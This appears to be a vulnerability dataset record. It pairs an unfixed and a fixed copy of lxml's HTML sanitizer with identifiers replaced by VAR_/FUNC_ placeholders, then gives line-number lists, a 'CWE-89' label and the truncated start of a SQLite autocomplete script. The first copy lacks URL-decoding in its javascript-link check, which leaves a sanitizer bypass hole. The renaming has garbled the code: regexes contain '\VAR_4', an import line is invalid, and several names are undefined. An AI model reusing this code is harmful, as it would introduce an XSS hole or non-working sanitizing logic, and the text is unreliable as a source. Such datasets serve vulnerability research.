for VAR_15 in VAR_55.iter(etree.Element):
VAR_96 = VAR_15.attrib
for aname in VAR_96.keys():
if aname not in VAR_50:
del VAR_96[aname]
if self.javascript:
if not (self.safe_attrs_only and
self.safe_attrs == defs.safe_attrs):
for VAR_15 in VAR_55.iter(etree.Element):
VAR_96 = VAR_15.attrib
for aname in VAR_96.keys():
if aname.startswith('on'):
del VAR_96[aname]
VAR_55.rewrite_links(self._remove_javascript_link,
resolve_base_href=False)
if not self.inline_style:
for VAR_15 in VAR_7(VAR_55):
VAR_102 = VAR_15.get('style')
VAR_82 = VAR_0.sub('', VAR_102)
VAR_82 = VAR_1.sub('', VAR_82)
if self._has_sneaky_javascript(VAR_82):
del VAR_15.attrib['style']
elif VAR_82 != VAR_102:
VAR_15.set('style', VAR_82)
if not self.style:
for VAR_15 in list(VAR_55.iter('style')):
if VAR_15.get('type', '').lower().strip() == 'text/javascript':
VAR_15.drop_tree()
continue
VAR_102 = VAR_15.text or ''
VAR_82 = VAR_0.sub('', VAR_102)
VAR_82 = VAR_1.sub('', VAR_102)
if self._has_sneaky_javascript(VAR_82):
VAR_15.text = '/* deleted */'
elif VAR_82 != VAR_102:
VAR_15.text = VAR_82
if self.comments or self.processing_instructions:
VAR_47.add(etree.Comment)
if self.processing_instructions:
VAR_47.add(etree.ProcessingInstruction)
if self.style:
VAR_47.add('style')
if self.inline_style:
etree.strip_attributes(VAR_55, 'style')
if self.links:
VAR_47.add('link')
elif self.style or self.javascript:
for VAR_15 in list(VAR_55.iter('link')):
if 'stylesheet' in VAR_15.get('rel', '').lower():
if not self.allow_element(VAR_15):
VAR_15.drop_tree()
if self.meta:
VAR_47.add('meta')
if self.page_structure:
VAR_45.update(('head', 'html', 'title'))
if self.embedded:
for VAR_15 in list(VAR_55.iter('param')):
VAR_97 = False
VAR_98 = VAR_15.getparent()
while VAR_98 is not None and VAR_98.tag not in ('applet', 'object'):
VAR_98 = VAR_98.getparent()
if VAR_98 is None:
VAR_15.drop_tree()
VAR_47.update(('applet',))
VAR_45.update(('iframe', 'embed', 'layer', 'object', 'param'))
if self.frames:
VAR_47.update(defs.frame_tags)
if self.forms:
VAR_45.add('form')
VAR_47.update(('button', 'input', 'select', 'textarea'))
if self.annoying_tags:
VAR_45.update(('blink', 'marquee'))
VAR_73 = []
VAR_74 = []
for VAR_15 in VAR_55.iter():
if VAR_15.tag in VAR_47:
if self.allow_element(VAR_15):
continue
VAR_74.append(VAR_15)
elif VAR_15.tag in VAR_45:
if self.allow_element(VAR_15):
continue
VAR_73.append(VAR_15)
if VAR_73 and VAR_73[0] == VAR_55:
VAR_15 = VAR_73.pop(0)
VAR_15.tag = 'div'
VAR_15.attrib.clear()
elif VAR_74 and VAR_74[0] == VAR_55:
VAR_15 = VAR_74.pop(0)
if VAR_15.tag != 'html':
VAR_15.tag = 'div'
VAR_15.clear()
VAR_74.reverse() # VAR_90 with innermost tags
for VAR_15 in VAR_74:
VAR_15.drop_tree()
for VAR_15 in VAR_73:
VAR_15.drop_tag()
if self.remove_unknown_tags:
if VAR_46:
raise ValueError(
"It does not make sense to pass in both VAR_46 and remove_unknown_tags")
VAR_46 = set(defs.tags)
if VAR_46:
VAR_81 = []
for VAR_15 in VAR_55.iter():
if VAR_15.tag not in VAR_46:
VAR_81.append(VAR_15)
if VAR_81:
if VAR_81[0] is VAR_55:
VAR_15 = VAR_81.pop(0)
VAR_15.tag = 'div'
VAR_15.attrib.clear()
for VAR_15 in VAR_81:
VAR_15.drop_tag()
if self.add_nofollow:
for VAR_15 in VAR_8(VAR_55):
if not self.allow_follow(VAR_15):
VAR_103 = VAR_15.get('rel')
if VAR_103:
if ('nofollow' in VAR_103
and ' nofollow ' in (' %VAR_4 ' % VAR_103)):
continue
VAR_103 = '%VAR_4 nofollow' % VAR_103
else:
VAR_103 = 'nofollow'
VAR_15.set('rel', VAR_103)
def FUNC_8(self, VAR_56):
return False
def FUNC_9(self, VAR_15):
if VAR_15.tag not in self._tag_link_attrs:
return False
VAR_75 = self._tag_link_attrs[VAR_15.tag]
if isinstance(VAR_75, (list, tuple)):
for one_attr in VAR_75:
VAR_57 = VAR_15.get(one_attr)
if not VAR_57:
return False
if not self.allow_embedded_url(VAR_15, VAR_57):
return False
return True
else:
VAR_57 = VAR_15.get(VAR_75)
if not VAR_57:
return False
return self.allow_embedded_url(VAR_15, VAR_57)
def FUNC_10(self, VAR_15, VAR_57):
if (self.whitelist_tags is not None
and VAR_15.tag not in self.whitelist_tags):
return False
VAR_76, VAR_77, VAR_78, VAR_79, VAR_80 = urlsplit(VAR_57)
VAR_77 = netloc.lower().split(':', 1)[0]
if VAR_76 not in ('http', 'https'):
return False
if VAR_77 in self.host_whitelist:
return True
return False
def FUNC_11(self, VAR_55):
VAR_81 = []
self._kill_elements(
VAR_55, lambda VAR_15: VAR_6.search(VAR_15.text),
etree.Comment)
def FUNC_12(self, VAR_55, VAR_58, VAR_59=None):
VAR_81 = []
for VAR_15 in VAR_55.iter(VAR_59):
if VAR_58(VAR_15):
VAR_81.append(VAR_15)
for VAR_15 in VAR_81:
VAR_15.drop_tree()
def FUNC_13(self, VAR_60):
VAR_82 = VAR_5('', VAR_60)
if FUNC_0(VAR_82):
return ''
return VAR_60
VAR_61 = re.compile(r'/\*.*?\*/', re.S).sub
def FUNC_14(self, VAR_35):
VAR_35 = self._substitute_comments('', VAR_35)
VAR_35 = VAR_35.replace('\\', '')
VAR_35 = VAR_5('', VAR_35)
VAR_35 = VAR_35.lower()
if 'javascript:' in VAR_35:
return True
if 'expression(' in VAR_35:
return True
return False
def VAR_10(self, VAR_22):
VAR_65 = type(VAR_22)
if isinstance(VAR_22, VAR_72):
VAR_55 = fromstring(VAR_22)
else:
VAR_55 = copy.deepcopy(VAR_22)
self(VAR_55)
return _transform_result(VAR_65, VAR_55)
VAR_9 = CLASS_0()
VAR_10 = VAR_9.clean_html
VAR_11 = [
re.compile(r'(?P<VAR_88>https?://(?P<VAR_101>[a-z0-9._-]+)(?:/[/\-_.,a-z0-9%&?;=~]*)?(?:\([/\-_.,a-z0-9%&?;=~]*\))?)', re.I),
re.compile(r'mailto:(?P<VAR_88>[a-z0-9._-]+@(?P<VAR_101>[a-z0-9_.-]+[a-z]))', re.I),
]
VAR_12 = ['textarea', 'pre', 'code', 'head', 'select', 'a']
VAR_13 = [
re.compile(r'^localhost', re.I),
re.compile(r'\bexample\.(?:com|org|net)$', re.I),
re.compile(r'^127\.0\.0\.1$'),
]
VAR_14 = ['nolink']
def FUNC_1(VAR_15, VAR_16=VAR_11,
VAR_17=VAR_12,
VAR_18=VAR_13,
VAR_19=VAR_14):
if VAR_15.tag in VAR_17:
return
VAR_62 = VAR_15.get('class')
if VAR_62:
VAR_62 = VAR_62.split()
for match_class in VAR_19:
if match_class in VAR_62:
return
for child in list(VAR_15):
FUNC_1(child, VAR_16=link_regexes,
VAR_17=avoid_elements,
VAR_18=avoid_hosts,
VAR_19=avoid_classes)
if child.tail:
VAR_20, VAR_92 = FUNC_2(
child.tail, VAR_16, VAR_18, VAR_21=VAR_15.makeelement)
if VAR_92:
child.tail = VAR_20
VAR_99 = VAR_15.index(child)
VAR_15[VAR_99+1:VAR_99+1] = VAR_92
if VAR_15.text:
VAR_20, VAR_83 = FUNC_2(
VAR_15.text, VAR_16, VAR_18, VAR_21=VAR_15.makeelement)
if VAR_83:
VAR_15.text = VAR_20
VAR_15[:0] = VAR_83
def FUNC_2(VAR_20, VAR_16, VAR_18, VAR_21):
VAR_63 = ''
VAR_37 = []
VAR_64 = 0
while 1:
VAR_84, VAR_85 = None, None
for regex in VAR_16:
VAR_93 = VAR_64
while 1:
VAR_100 = regex.search(VAR_20, pos=VAR_93)
if VAR_100 is None:
break
VAR_101 = VAR_100.group('host')
for host_regex in VAR_18:
if host_regex.search(VAR_101):
VAR_93 = VAR_100.end()
break
else:
break
if VAR_100 is None:
continue
if VAR_85 is None or VAR_100.start() < VAR_85:
VAR_84 = VAR_100
VAR_85 = VAR_100.start()
if VAR_84 is None:
if VAR_37:
assert not VAR_37[-1].tail
VAR_37[-1].tail = VAR_20
else:
assert not VAR_63
leading_text = VAR_20
break
VAR_60 = VAR_84.group(0)
VAR_86 = VAR_84.end()
if VAR_60.endswith('.') or VAR_60.endswith(','):
VAR_86 -= 1
VAR_60 = link[:-1]
VAR_87 = VAR_20[:VAR_84.start()]
if VAR_37:
assert not VAR_37[-1].tail
VAR_37[-1].tail = VAR_87
else:
assert not VAR_63
leading_text = VAR_87
VAR_56 = VAR_21('a')
VAR_56.set('href', VAR_60)
VAR_88 = VAR_84.group('body')
if not VAR_88:
VAR_88 = VAR_60
if VAR_88.endswith('.') or VAR_88.endswith(','):
VAR_88 = body[:-1]
VAR_56.text = VAR_88
VAR_37.append(VAR_56)
VAR_20 = text[VAR_86:]
return VAR_63, VAR_37
def FUNC_3(VAR_22, *VAR_23, **VAR_24):
VAR_65 = type(VAR_22)
if isinstance(VAR_22, VAR_72):
VAR_55 = fromstring(VAR_22)
else:
VAR_55 = copy.deepcopy(VAR_22)
FUNC_1(VAR_55, *VAR_23, **VAR_24)
return _transform_result(VAR_65, VAR_55)
FUNC_3.__doc__ = FUNC_1.__doc__
VAR_25 = ['pre', 'textarea', 'code']
VAR_26 = ['nobreak']
def FUNC_4(VAR_15, VAR_27=40,
VAR_17=VAR_25,
VAR_19=VAR_26,
VAR_28=VAR_69(0x200b)):
if VAR_15.tag in VAR_25:
return
VAR_62 = VAR_15.get('class')
if VAR_62:
VAR_89 = False
VAR_62 = VAR_62.split()
for avoid in VAR_19:
if avoid in VAR_62:
VAR_89 = True
break
if VAR_89:
return
if VAR_15.text:
VAR_15.text = FUNC_6(VAR_15.text, VAR_27, VAR_28)
for child in VAR_15:
FUNC_4(child, VAR_27=max_width,
VAR_17=avoid_elements,
VAR_19=avoid_classes,
VAR_28=break_character)
if child.tail:
child.tail = FUNC_6(child.tail, VAR_27, VAR_28)
def FUNC_5(VAR_22, *VAR_23, **VAR_24):
VAR_65 = type(VAR_22)
VAR_55 = fromstring(VAR_22)
FUNC_4(VAR_55, *VAR_23, **VAR_24)
return _transform_result(VAR_65, VAR_55)
def FUNC_6(VAR_20, VAR_27, VAR_28):
VAR_66 = VAR_20.split()
for VAR_30 in VAR_66:
if len(VAR_30) > VAR_27:
VAR_94 = FUNC_7(VAR_30, VAR_27, VAR_28)
VAR_20 = VAR_20.replace(VAR_30, VAR_94)
return VAR_20
VAR_29 = re.compile(r'[^a-z]', re.I)
def FUNC_7(VAR_30, VAR_31, VAR_28):
VAR_67 = VAR_30
VAR_68 = ''
while len(VAR_30) > VAR_31:
VAR_90 = VAR_30[:VAR_31]
VAR_91 = list(VAR_29.finditer(VAR_90))
if VAR_91:
VAR_95 = VAR_91[-1]
if VAR_95.end() > VAR_31-10:
VAR_90 = VAR_30[:VAR_95.end()]
VAR_68 += VAR_90 + VAR_28
VAR_30 = word[len(VAR_90):]
VAR_68 += VAR_30
return VAR_68
|
import re
import copy
try:
from urlparse import .urlsplit
from urllib import unquote_plus
except ImportError:
from urllib.parse import .urlsplit, unquote_plus
from lxml import etree
from lxml.html import defs
from lxml.html import fromstring, XHTML_NAMESPACE
from lxml.html import xhtml_to_html, _transform_result
try:
VAR_69
except NameError:
VAR_69 = chr
try:
VAR_70
except NameError:
VAR_70 = str
try:
VAR_71
except NameError:
VAR_71 = str
try:
VAR_72
except NameError:
VAR_72 = (str, VAR_71)
__all__ = ['clean_html', 'clean', 'Cleaner', 'autolink', 'autolink_html',
'word_break', 'word_break_html']
VAR_0 = re.compile(
r'expression\VAR_4*\(.*?\)', re.S|re.I)
VAR_1 = re.compile(
r'@\VAR_4*import', re.I)
VAR_2 = re.compile(
r'^data:image/.+;base64', re.I).search
VAR_3 = re.compile(
r'(?:VAR_33|jscript|livescript|vbscript|data|about|mocha):',
re.I).search
def FUNC_0(VAR_4):
if VAR_2(VAR_4):
return None
return VAR_3(VAR_4)
VAR_5 = re.compile(r'[\VAR_4\x00-\x08\x0B\x0C\x0E-\x19]+').sub
VAR_6 = re.compile(
r'\[if[\VAR_4\n\r]+.*?][\VAR_4\n\r]*>', re.I|re.S)
VAR_7 = etree.XPath(
"descendant-or-self::*[@VAR_35]")
VAR_8 = etree.XPath(
("descendant-or-self::a [normalize-space(@href) and substring(normalize-space(@href),1,1) != '#'] |"
"descendant-or-self::x:a[normalize-space(@href) and substring(normalize-space(@href),1,1) != '#']"),
namespaces={'x':XHTML_NAMESPACE})
class CLASS_0(object):
VAR_32 = True
VAR_33 = True
VAR_34 = True
VAR_35 = False
VAR_36 = None
VAR_37 = True
VAR_38 = True
VAR_39 = True
VAR_40 = True
VAR_41 = True
VAR_42 = True
VAR_43 = True
VAR_44 = True
VAR_45 = None
VAR_46 = None
VAR_47 = None
VAR_48 = True
VAR_49 = True
VAR_50 = defs.safe_attrs
VAR_51 = False
VAR_52 = ()
VAR_53 = set(['iframe', 'embed'])
def __init__(self, **VAR_24):
for name, value in VAR_24.items():
if not hasattr(self, name):
raise TypeError(
"Unknown parameter: %VAR_4=%r" % (name, value))
setattr(self, name, value)
if self.inline_style is None and 'inline_style' not in VAR_24:
self.inline_style = self.style
VAR_54 = dict(
script='src',
VAR_60='href',
applet=['code', 'object'],
iframe='src',
embed='src',
layer='src',
a='href',
)
def __call__(self, VAR_55):
if hasattr(VAR_55, 'getroot'):
VAR_55 = VAR_55.getroot()
xhtml_to_html(VAR_55)
for VAR_15 in VAR_55.iter('image'):
VAR_15.tag = 'img'
if not self.comments:
self.kill_conditional_comments(VAR_55)
VAR_47 = set(self.kill_tags or ())
VAR_45 = set(self.remove_tags or ())
VAR_46 = set(self.allow_tags or ())
if self.scripts:
VAR_47.add('script')
if self.safe_attrs_only:
VAR_50 = set(self.safe_attrs)
for VAR_15 in VAR_55.iter(etree.Element):
VAR_96 = VAR_15.attrib
for aname in VAR_96.keys():
if aname not in VAR_50:
del VAR_96[aname]
if self.javascript:
if not (self.safe_attrs_only and
self.safe_attrs == defs.safe_attrs):
for VAR_15 in VAR_55.iter(etree.Element):
VAR_96 = VAR_15.attrib
for aname in VAR_96.keys():
if aname.startswith('on'):
del VAR_96[aname]
VAR_55.rewrite_links(self._remove_javascript_link,
resolve_base_href=False)
if not self.inline_style:
for VAR_15 in VAR_7(VAR_55):
VAR_102 = VAR_15.get('style')
VAR_82 = VAR_0.sub('', VAR_102)
VAR_82 = VAR_1.sub('', VAR_82)
if self._has_sneaky_javascript(VAR_82):
del VAR_15.attrib['style']
elif VAR_82 != VAR_102:
VAR_15.set('style', VAR_82)
if not self.style:
for VAR_15 in list(VAR_55.iter('style')):
if VAR_15.get('type', '').lower().strip() == 'text/javascript':
VAR_15.drop_tree()
continue
VAR_102 = VAR_15.text or ''
VAR_82 = VAR_0.sub('', VAR_102)
VAR_82 = VAR_1.sub('', VAR_102)
if self._has_sneaky_javascript(VAR_82):
VAR_15.text = '/* deleted */'
elif VAR_82 != VAR_102:
VAR_15.text = VAR_82
if self.comments or self.processing_instructions:
VAR_47.add(etree.Comment)
if self.processing_instructions:
VAR_47.add(etree.ProcessingInstruction)
if self.style:
VAR_47.add('style')
if self.inline_style:
etree.strip_attributes(VAR_55, 'style')
if self.links:
VAR_47.add('link')
elif self.style or self.javascript:
for VAR_15 in list(VAR_55.iter('link')):
if 'stylesheet' in VAR_15.get('rel', '').lower():
if not self.allow_element(VAR_15):
VAR_15.drop_tree()
if self.meta:
VAR_47.add('meta')
if self.page_structure:
VAR_45.update(('head', 'html', 'title'))
if self.embedded:
for VAR_15 in list(VAR_55.iter('param')):
VAR_97 = False
VAR_98 = VAR_15.getparent()
while VAR_98 is not None and VAR_98.tag not in ('applet', 'object'):
VAR_98 = VAR_98.getparent()
if VAR_98 is None:
VAR_15.drop_tree()
VAR_47.update(('applet',))
VAR_45.update(('iframe', 'embed', 'layer', 'object', 'param'))
if self.frames:
VAR_47.update(defs.frame_tags)
if self.forms:
VAR_45.add('form')
VAR_47.update(('button', 'input', 'select', 'textarea'))
if self.annoying_tags:
VAR_45.update(('blink', 'marquee'))
VAR_73 = []
VAR_74 = []
for VAR_15 in VAR_55.iter():
if VAR_15.tag in VAR_47:
if self.allow_element(VAR_15):
continue
VAR_74.append(VAR_15)
elif VAR_15.tag in VAR_45:
if self.allow_element(VAR_15):
continue
VAR_73.append(VAR_15)
if VAR_73 and VAR_73[0] == VAR_55:
VAR_15 = VAR_73.pop(0)
VAR_15.tag = 'div'
VAR_15.attrib.clear()
elif VAR_74 and VAR_74[0] == VAR_55:
VAR_15 = VAR_74.pop(0)
if VAR_15.tag != 'html':
VAR_15.tag = 'div'
VAR_15.clear()
VAR_74.reverse() # VAR_90 with innermost tags
for VAR_15 in VAR_74:
VAR_15.drop_tree()
for VAR_15 in VAR_73:
VAR_15.drop_tag()
if self.remove_unknown_tags:
if VAR_46:
raise ValueError(
"It does not make sense to pass in both VAR_46 and remove_unknown_tags")
VAR_46 = set(defs.tags)
if VAR_46:
VAR_81 = []
for VAR_15 in VAR_55.iter():
if VAR_15.tag not in VAR_46:
VAR_81.append(VAR_15)
if VAR_81:
if VAR_81[0] is VAR_55:
VAR_15 = VAR_81.pop(0)
VAR_15.tag = 'div'
VAR_15.attrib.clear()
for VAR_15 in VAR_81:
VAR_15.drop_tag()
if self.add_nofollow:
for VAR_15 in VAR_8(VAR_55):
if not self.allow_follow(VAR_15):
VAR_103 = VAR_15.get('rel')
if VAR_103:
if ('nofollow' in VAR_103
and ' nofollow ' in (' %VAR_4 ' % VAR_103)):
continue
VAR_103 = '%VAR_4 nofollow' % VAR_103
else:
VAR_103 = 'nofollow'
VAR_15.set('rel', VAR_103)
def FUNC_8(self, VAR_56):
return False
def FUNC_9(self, VAR_15):
if VAR_15.tag not in self._tag_link_attrs:
return False
VAR_75 = self._tag_link_attrs[VAR_15.tag]
if isinstance(VAR_75, (list, tuple)):
for one_attr in VAR_75:
VAR_57 = VAR_15.get(one_attr)
if not VAR_57:
return False
if not self.allow_embedded_url(VAR_15, VAR_57):
return False
return True
else:
VAR_57 = VAR_15.get(VAR_75)
if not VAR_57:
return False
return self.allow_embedded_url(VAR_15, VAR_57)
def FUNC_10(self, VAR_15, VAR_57):
if (self.whitelist_tags is not None
and VAR_15.tag not in self.whitelist_tags):
return False
VAR_76, VAR_77, VAR_78, VAR_79, VAR_80 = urlsplit(VAR_57)
VAR_77 = netloc.lower().split(':', 1)[0]
if VAR_76 not in ('http', 'https'):
return False
if VAR_77 in self.host_whitelist:
return True
return False
def FUNC_11(self, VAR_55):
VAR_81 = []
self._kill_elements(
VAR_55, lambda VAR_15: VAR_6.search(VAR_15.text),
etree.Comment)
def FUNC_12(self, VAR_55, VAR_58, VAR_59=None):
VAR_81 = []
for VAR_15 in VAR_55.iter(VAR_59):
if VAR_58(VAR_15):
VAR_81.append(VAR_15)
for VAR_15 in VAR_81:
VAR_15.drop_tree()
def FUNC_13(self, VAR_60):
VAR_82 = VAR_5('', unquote_plus(VAR_60))
if FUNC_0(VAR_82):
return ''
return VAR_60
VAR_61 = re.compile(r'/\*.*?\*/', re.S).sub
def FUNC_14(self, VAR_35):
VAR_35 = self._substitute_comments('', VAR_35)
VAR_35 = VAR_35.replace('\\', '')
VAR_35 = VAR_5('', VAR_35)
VAR_35 = VAR_35.lower()
if 'javascript:' in VAR_35:
return True
if 'expression(' in VAR_35:
return True
return False
def VAR_10(self, VAR_22):
VAR_65 = type(VAR_22)
if isinstance(VAR_22, VAR_72):
VAR_55 = fromstring(VAR_22)
else:
VAR_55 = copy.deepcopy(VAR_22)
self(VAR_55)
return _transform_result(VAR_65, VAR_55)
VAR_9 = CLASS_0()
VAR_10 = VAR_9.clean_html
VAR_11 = [
re.compile(r'(?P<VAR_88>https?://(?P<VAR_101>[a-z0-9._-]+)(?:/[/\-_.,a-z0-9%&?;=~]*)?(?:\([/\-_.,a-z0-9%&?;=~]*\))?)', re.I),
re.compile(r'mailto:(?P<VAR_88>[a-z0-9._-]+@(?P<VAR_101>[a-z0-9_.-]+[a-z]))', re.I),
]
VAR_12 = ['textarea', 'pre', 'code', 'head', 'select', 'a']
VAR_13 = [
re.compile(r'^localhost', re.I),
re.compile(r'\bexample\.(?:com|org|net)$', re.I),
re.compile(r'^127\.0\.0\.1$'),
]
VAR_14 = ['nolink']
def FUNC_1(VAR_15, VAR_16=VAR_11,
VAR_17=VAR_12,
VAR_18=VAR_13,
VAR_19=VAR_14):
if VAR_15.tag in VAR_17:
return
VAR_62 = VAR_15.get('class')
if VAR_62:
VAR_62 = VAR_62.split()
for match_class in VAR_19:
if match_class in VAR_62:
return
for child in list(VAR_15):
FUNC_1(child, VAR_16=link_regexes,
VAR_17=avoid_elements,
VAR_18=avoid_hosts,
VAR_19=avoid_classes)
if child.tail:
VAR_20, VAR_92 = FUNC_2(
child.tail, VAR_16, VAR_18, VAR_21=VAR_15.makeelement)
if VAR_92:
child.tail = VAR_20
VAR_99 = VAR_15.index(child)
VAR_15[VAR_99+1:VAR_99+1] = VAR_92
if VAR_15.text:
VAR_20, VAR_83 = FUNC_2(
VAR_15.text, VAR_16, VAR_18, VAR_21=VAR_15.makeelement)
if VAR_83:
VAR_15.text = VAR_20
VAR_15[:0] = VAR_83
def FUNC_2(VAR_20, VAR_16, VAR_18, VAR_21):
VAR_63 = ''
VAR_37 = []
VAR_64 = 0
while 1:
VAR_84, VAR_85 = None, None
for regex in VAR_16:
VAR_93 = VAR_64
while 1:
VAR_100 = regex.search(VAR_20, pos=VAR_93)
if VAR_100 is None:
break
VAR_101 = VAR_100.group('host')
for host_regex in VAR_18:
if host_regex.search(VAR_101):
VAR_93 = VAR_100.end()
break
else:
break
if VAR_100 is None:
continue
if VAR_85 is None or VAR_100.start() < VAR_85:
VAR_84 = VAR_100
VAR_85 = VAR_100.start()
if VAR_84 is None:
if VAR_37:
assert not VAR_37[-1].tail
VAR_37[-1].tail = VAR_20
else:
assert not VAR_63
leading_text = VAR_20
break
VAR_60 = VAR_84.group(0)
VAR_86 = VAR_84.end()
if VAR_60.endswith('.') or VAR_60.endswith(','):
VAR_86 -= 1
VAR_60 = link[:-1]
VAR_87 = VAR_20[:VAR_84.start()]
if VAR_37:
assert not VAR_37[-1].tail
VAR_37[-1].tail = VAR_87
else:
assert not VAR_63
leading_text = VAR_87
VAR_56 = VAR_21('a')
VAR_56.set('href', VAR_60)
VAR_88 = VAR_84.group('body')
if not VAR_88:
VAR_88 = VAR_60
if VAR_88.endswith('.') or VAR_88.endswith(','):
VAR_88 = body[:-1]
VAR_56.text = VAR_88
VAR_37.append(VAR_56)
VAR_20 = text[VAR_86:]
return VAR_63, VAR_37
def FUNC_3(VAR_22, *VAR_23, **VAR_24):
VAR_65 = type(VAR_22)
if isinstance(VAR_22, VAR_72):
VAR_55 = fromstring(VAR_22)
else:
VAR_55 = copy.deepcopy(VAR_22)
FUNC_1(VAR_55, *VAR_23, **VAR_24)
return _transform_result(VAR_65, VAR_55)
FUNC_3.__doc__ = FUNC_1.__doc__
VAR_25 = ['pre', 'textarea', 'code']
VAR_26 = ['nobreak']
def FUNC_4(VAR_15, VAR_27=40,
VAR_17=VAR_25,
VAR_19=VAR_26,
VAR_28=VAR_69(0x200b)):
if VAR_15.tag in VAR_25:
return
VAR_62 = VAR_15.get('class')
if VAR_62:
VAR_89 = False
VAR_62 = VAR_62.split()
for avoid in VAR_19:
if avoid in VAR_62:
VAR_89 = True
break
if VAR_89:
return
if VAR_15.text:
VAR_15.text = FUNC_6(VAR_15.text, VAR_27, VAR_28)
for child in VAR_15:
FUNC_4(child, VAR_27=max_width,
VAR_17=avoid_elements,
VAR_19=avoid_classes,
VAR_28=break_character)
if child.tail:
child.tail = FUNC_6(child.tail, VAR_27, VAR_28)
def FUNC_5(VAR_22, *VAR_23, **VAR_24):
VAR_65 = type(VAR_22)
VAR_55 = fromstring(VAR_22)
FUNC_4(VAR_55, *VAR_23, **VAR_24)
return _transform_result(VAR_65, VAR_55)
def FUNC_6(VAR_20, VAR_27, VAR_28):
VAR_66 = VAR_20.split()
for VAR_30 in VAR_66:
if len(VAR_30) > VAR_27:
VAR_94 = FUNC_7(VAR_30, VAR_27, VAR_28)
VAR_20 = VAR_20.replace(VAR_30, VAR_94)
return VAR_20
VAR_29 = re.compile(r'[^a-z]', re.I)
def FUNC_7(VAR_30, VAR_31, VAR_28):
VAR_67 = VAR_30
VAR_68 = ''
while len(VAR_30) > VAR_31:
VAR_90 = VAR_30[:VAR_31]
VAR_91 = list(VAR_29.finditer(VAR_90))
if VAR_91:
VAR_95 = VAR_91[-1]
if VAR_95.end() > VAR_31-10:
VAR_90 = VAR_30[:VAR_95.end()]
VAR_68 += VAR_90 + VAR_28
VAR_30 = word[len(VAR_90):]
VAR_68 += VAR_30
return VAR_68
| [
2,
6,
12,
18,
22,
27,
32,
38,
39,
42,
43,
44,
45,
46,
47,
48,
49,
50,
51,
52,
53,
54,
55,
56,
57,
58,
59,
60,
61,
62,
63,
66,
67,
70,
71,
72,
82,
84,
85,
86,
89,
92,
97,
98,
104,
107,
111,
114,
117,
120,
123,
126,
129,
132,
135,
138,
141,
144,
148,
152,
155,
158,
162,
166,
169,
178,
181,
183,
190,
193,
216,
225,
226,
227,
231,
232,
237,
238,
239,
240,
241,
242,
243,
244,
247,
253,
255,
257,
258,
262,
263,
265,
269,
282,
290,
291,
298,
309,
312,
317,
318,
319,
330,
331,
334,
342,
343,
344,
353,
356,
357,
358,
365,
377,
379,
380,
385,
386,
391,
397,
427,
433,
451,
463,
474,
482,
484,
487,
490,
492,
498,
513,
522,
525,
526,
527,
528,
529,
532,
535,
537,
543,
545,
552,
555,
560,
590,
616,
627,
648,
657,
659,
660,
661,
662,
663,
666,
673,
676,
681,
684,
685,
707,
713,
721,
723,
732,
734,
735,
741,
742,
1,
2,
3,
4,
5,
100,
101,
102,
103,
104,
105,
106,
107,
108,
109,
110,
111,
112,
113,
114,
115,
116,
117,
118,
119,
120,
121,
122,
123,
124,
125,
126,
127,
128,
129,
130,
131,
132,
133,
134,
135,
136,
137,
138,
139,
140,
141,
142,
143,
144,
145,
146,
147,
148,
149,
150,
151,
152,
153,
154,
155,
156,
157,
158,
159,
160,
161,
162,
163,
164,
165,
166,
167,
168,
169,
170,
171,
172,
173,
174,
175,
176,
177,
178,
179,
180,
181,
182,
183,
184,
185,
186,
187,
188,
189,
190,
191,
192,
550,
551,
552,
553,
554,
555,
556,
557,
558,
559,
560,
561,
562,
563,
671,
672,
673,
674,
675,
676,
677,
678,
679,
680,
681,
682,
683,
249,
250,
251,
429,
430,
431,
465,
466,
467,
468,
469,
494,
495,
496,
497,
498,
499,
500,
501,
502,
503
] | [
2,
6,
13,
19,
23,
28,
33,
39,
40,
43,
44,
45,
46,
47,
48,
49,
50,
51,
52,
53,
54,
55,
56,
57,
58,
59,
60,
61,
62,
63,
64,
67,
68,
71,
72,
73,
83,
85,
86,
87,
90,
93,
98,
99,
105,
108,
112,
115,
118,
121,
124,
127,
130,
133,
136,
139,
142,
145,
149,
153,
156,
159,
163,
167,
170,
179,
182,
184,
191,
194,
217,
226,
227,
228,
232,
233,
238,
239,
240,
241,
242,
243,
244,
245,
248,
254,
256,
258,
259,
263,
264,
266,
270,
283,
291,
292,
299,
310,
313,
318,
319,
320,
331,
332,
335,
343,
344,
345,
354,
357,
358,
359,
366,
378,
380,
381,
386,
387,
392,
398,
428,
434,
452,
464,
475,
483,
485,
488,
491,
493,
499,
514,
523,
526,
527,
528,
529,
530,
533,
536,
538,
544,
546,
553,
556,
561,
591,
617,
628,
649,
658,
660,
661,
662,
663,
664,
667,
674,
677,
682,
685,
686,
708,
714,
722,
724,
733,
735,
736,
742,
743,
1,
2,
3,
4,
5,
101,
102,
103,
104,
105,
106,
107,
108,
109,
110,
111,
112,
113,
114,
115,
116,
117,
118,
119,
120,
121,
122,
123,
124,
125,
126,
127,
128,
129,
130,
131,
132,
133,
134,
135,
136,
137,
138,
139,
140,
141,
142,
143,
144,
145,
146,
147,
148,
149,
150,
151,
152,
153,
154,
155,
156,
157,
158,
159,
160,
161,
162,
163,
164,
165,
166,
167,
168,
169,
170,
171,
172,
173,
174,
175,
176,
177,
178,
179,
180,
181,
182,
183,
184,
185,
186,
187,
188,
189,
190,
191,
192,
193,
551,
552,
553,
554,
555,
556,
557,
558,
559,
560,
561,
562,
563,
564,
672,
673,
674,
675,
676,
677,
678,
679,
680,
681,
682,
683,
684,
250,
251,
252,
430,
431,
432,
466,
467,
468,
469,
470,
495,
496,
497,
498,
499,
500,
501,
502,
503,
504
] |
2CWE-89
import sqlite3
import re
import timeit
import sys
import os
# Locate the repository root ("RTX") on this file's absolute path and
# make the project's code/ directory importable.
pathlist = os.path.realpath(__file__).split(os.path.sep)
RTXindex = pathlist.index("RTX")
sys.path.append(os.path.sep.join([*pathlist[:(RTXindex + 1)], 'code']))
from RTXConfiguration import RTXConfiguration
RTXConfig = RTXConfiguration()
# Directory that holds the autocomplete SQLite database.
# NOTE(review): RTXConfig.autocomplete_path presumably points at the
# database file; confirm against RTXConfiguration.
autocomplete_filepath = os.path.sep.join([*pathlist[:(RTXindex + 1)], 'code', 'autocomplete'])
# Module-level connection and cursor, populated by load().
conn = None
cursor = None
def load():
global conn
global cursor
database_name = f"{autocomplete_filepath}{os.path.sep}{RTXConfig.autocomplete_path.split('/')[-1]}"
conn = sqlite3.connect(database_name)
cursor = conn.cursor()
return True
def get_nodes_like(word,requested_limit):
debug = False
t0 = timeit.default_timer()
requested_limit = int(requested_limit)
values = []
n_values = 0
if len(word) < 2:
return values
floor = word[:-1]
ceiling = floor + 'zz'
#### Get a list of matching node names that begin with these letters
if debug:
